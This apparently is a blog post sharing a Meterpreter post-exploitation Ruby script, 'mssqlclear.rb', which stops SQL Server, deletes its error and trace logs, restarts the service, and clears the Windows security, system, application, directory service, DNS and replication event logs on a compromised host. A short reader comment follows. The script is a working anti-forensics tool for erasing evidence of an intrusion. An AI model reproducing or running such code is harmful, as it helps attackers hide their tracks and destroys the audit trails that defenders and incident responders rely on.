Example of an MSSQL Log Clear (mssqlclear.rb)
#MSSQL Log Clear
def list_exec(session,cmdlst)
print_status("Running Command List ...")
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status "running command #{cmd}"
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
print_status("#{d}")
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end
commands = ['Net STOP "SQL Server (SQLEXPRESS)" ',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\ERRORLOG.*"',
'del "%SystemDrive%\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\LOG\log*.trc"',
'Net START "SQL Server (SQLEXPRESS)"']
def clrevtlgs(session)
evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
print_status("Clearing Event Logs, this will leave and event 517")
begin
evtlogs.each do |evl|
print_status("Clearing the #{evl} Event Log")
log = session.sys.eventlog.open(evl)
log.clear
end
print_status("All Event Logs have been cleared")
rescue ::Exception => e
print_status("Error clearing Event Log: #{e.class} #{e}")
end
end
list_exec(client,commands)
clrevtlgs(client)
i like how you remove CODED by ZEROCOLD
ReplyDelete